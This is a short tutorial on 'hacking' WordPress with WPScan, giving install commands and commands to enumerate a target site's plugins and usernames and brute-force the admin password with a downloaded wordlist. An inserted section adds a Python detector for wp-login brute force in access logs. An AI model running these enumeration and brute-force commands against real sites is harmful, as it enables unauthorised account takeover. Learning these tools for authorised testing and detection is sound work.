Tutorial on hacking WordPress with WPScan
This tutorial will show you how to scan a WordPress installation using WPScan. It covers how to download and install WPScan, download a wordlist, use WPScan to enumerate usernames and plugins, and brute-force the password of a known username.
WPScan is included in BackTrack 5 R1; if you are running R1 you can skip the installation part.
Installing WPScan in BT5.
Install dependencies by issuing the following commands:
apt-get install libcurl4-gnutls-dev
gem install --user-install mime-types
gem install --user-install xml-simple
gem install --user-install typhoeus
Install WPScan by issuing the following commands:
cd /pentest/web
wget http://wpscan.googlecode.com/files/wpscan-1.0.zip
unzip wpscan-1.0.zip
rm -rf wpscan-1.0.zip
cd wpscan-1.0
wget http://www.exploitthis.com/wp-content/uploads/files/wordlist.lst
Using WPScan
Update your WPScan plugin list:
ruby ./wpscan.rb --generate_plugin_list 250
Get WordPress version and theme information.
ruby ./wpscan.rb --url targetsite.com
Scan for WordPress plugins to exploit.
ruby ./wpscan.rb --url targetsite.com --enumerate p
Find out WordPress usernames.
ruby ./wpscan.rb --url targetsite.com --enumerate u
Brute-force the WordPress admin account.
ruby ./wpscan.rb --url targetsite.com --wordlist wordlist.lst --username admin
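As an added defensive counterpart to the brute-force step above (example code written for this page; it is not part of WPScan or the original tutorial), here is a small Python script that reads web-server access logs in Apache "combined" format and flags any source address that sends a burst of failed POSTs to wp-login.php, which is what a wordlist run against a single account looks like from the server side. The log lines, the IP addresses, the 10-attempts-in-60-seconds threshold and all function names are constructed for the example; the only WordPress-specific fact it relies on is that a failed login re-renders wp-login.php with HTTP 200 while a successful one redirects with 302.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" access-log line. Captures what the detector needs:
# client address, timestamp, request method, request path and response status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def detect_login_bruteforce(lines, threshold=10, window_seconds=60):
    """Return {ip: max_failed_attempts_in_one_window} for every source address
    that reaches `threshold` failed POSTs to /wp-login.php inside any
    `window_seconds`-long sliding window. Other addresses are not reported.

    A failed WordPress login answers 200 (the form is re-rendered with an
    error); a successful one answers 302, so only 200s count as failures.
    """
    failures = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: ignore rather than crash on it
        if m["method"] != "POST" or m["path"].split("?", 1)[0] != "/wp-login.php":
            continue
        if m["status"] != "200":
            continue
        failures[m["ip"]].append(datetime.strptime(m["ts"], TS_FORMAT))

    alerts = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            # Slide the window start forward until it fits within window_seconds.
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= threshold and count > alerts.get(ip, 0):
                alerts[ip] = count
    return alerts


def build_sample_log():
    """Constructed sample log (not real traffic): one legitimate user who
    mistypes the password twice and then logs in, and one host (203.0.113.5)
    running a wordlist against the login form."""
    base = datetime(2012, 10, 10, 13, 56, 0, tzinfo=timezone.utc)
    post = '{ip} - - [{ts}] "POST /wp-login.php HTTP/1.1" {status} {size} "-" "Mozilla/5.0"'
    lines = [
        '198.51.100.7 - - [10/Oct/2012:13:55:36 +0000] '
        '"GET /wp-login.php HTTP/1.1" 200 3471 "-" "Mozilla/5.0"',
    ]
    # Legitimate user: two failures (200) spaced out, then success (302).
    for offset, status, size in ((5, 200, 3471), (40, 200, 3471), (70, 302, 0)):
        ts = (base + timedelta(seconds=offset)).strftime(TS_FORMAT)
        lines.append(post.format(ip="198.51.100.7", ts=ts, status=status, size=size))
    # Wordlist run: 30 failed attempts in 30 seconds from a single address.
    for i in range(30):
        ts = (base + timedelta(seconds=i)).strftime(TS_FORMAT)
        lines.append(post.format(ip="203.0.113.5", ts=ts, status=200, size=3471))
    return lines


if __name__ == "__main__":
    for ip, count in detect_login_bruteforce(build_sample_log()).items():
        print(f"possible wp-login brute force from {ip}: {count} failures within 60s")
```

On the constructed sample the legitimate user stays below the threshold and the wordlist host is reported with 30 failures in one window. To run it against a real server, pass `open("/var/log/apache2/access.log")` (or whatever your log path is) instead of `build_sample_log()`; the window and threshold are a starting point to tune, and the same count is a reasonable trigger for a fail2ban-style block or a login rate limit on the server itself.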
As you can see, WPScan is very simple. We were able to get the WordPress theme, plugins, and username. The target site did not have any vulnerable plugins installed. If it did, WPScan would have told us what exploits we could use for the vulnerable plugin.
You can find more information on WPScan at http://code.google.com/p/wpscan/